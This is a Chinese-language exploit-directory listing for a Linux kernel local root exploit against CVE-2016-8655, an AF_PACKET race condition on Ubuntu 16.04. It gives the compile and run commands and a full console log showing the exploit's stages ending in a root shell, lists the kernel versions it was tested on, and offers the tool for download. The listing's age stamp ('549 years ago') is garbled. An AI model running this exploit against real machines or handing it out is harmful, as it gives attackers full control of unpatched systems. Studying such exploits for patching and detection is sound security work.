Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2016-8655 — 针对CVE-2016-8655的Linux内核本地权限提升利用程序,利用AF_PACKET竞态条件,在Ubuntu 16.04 x86_64上通过内存操作获取root shell。 | Kitploit
工具/GitHubGitHub/lakshmidesai/cve-2016-8655
权限提升漏洞分析漏洞利用二进制利用
GitHublakshmidesai/cve-2016-8655

CVE-2016-8655

针对CVE-2016-8655的Linux内核本地权限提升利用程序,利用AF_PACKET竞态条件,在Ubuntu 16.04 x86_64上通过内存操作获取root shell。

查看仓库
549年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ocobo_root.c linux AF_PACKET 竞态条件漏洞利用 针对 Ubuntu 16.04 x86_64 的漏洞利用

user@ubuntu:$ gcc chocobo_root.c -o chocobo_root -lpthread user@ubuntu:$ ./chocobo_root

使 vsyscall 页面可写..

新的漏洞利用尝试开始,跳转到 0xffffffff8106f320,参数=0xffffffffff600000 套接字已分配 移除屏障并进行喷射.. 版本切换器停止,x = -1 (y = 174222, 最后一个值 = 2) 当前数据包版本 = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0,竞态条件获胜 === 请等待最多几分钟让定时器执行。如果你现在按Ctrl-C,内核将会挂起。请不要那样做。 关闭套接字并验证....... vsyscall 页面已修改!

阶段 1 完成 注册新的 sysctl..

新的漏洞利用尝试开始,跳转到 0xffffffff812879a0,参数=0xffffffffff600850 套接字已分配 移除屏障并进行喷射.. 版本切换器停止,x = -1 (y = 30773, 最后一个值 = 0) 当前数据包版本 = 2 pbd->hdr.bh1.offset_to_first_pkt = 48 竞态条件未获胜

重试阶段.. 新的漏洞利用尝试开始,跳转到 0xffffffff812879a0,参数=0xffffffffff600850 套接字已分配 移除屏障并进行喷射.. 版本切换器停止,x = -1 (y = 133577, 最后一个值 = 2) 当前数据包版本 = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0,竞态条件获胜 === 请等待最多几分钟让定时器执行。如果你现在按Ctrl-C,内核将会挂起。请不要那样做。 关闭套接字并验证....... sysctl 已添加!

阶段 2 完成 内核执行了二进制文件,启动 root shell root@ubuntu:~# id uid=0(root) gid=0(root) groups=0(root),1000(user)

==============================

包含了旧内核的偏移量,但未经测试,因此请注意此漏洞利用可能会使早于 4.4 的内核崩溃。

已测试于: Ubuntu 16.04: 4.4.0-51-generic Ubuntu 16.04: 4.4.0-47-generic Ubuntu 16.04: 4.4.0-36-generic Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

感谢: jsc 提供的灵感 (https://www.youtube.com/watch?v=x4UDIfcYMKI) mcdelivery 提供的热饼和咖啡

2016年11月 作者:rebel

下载工具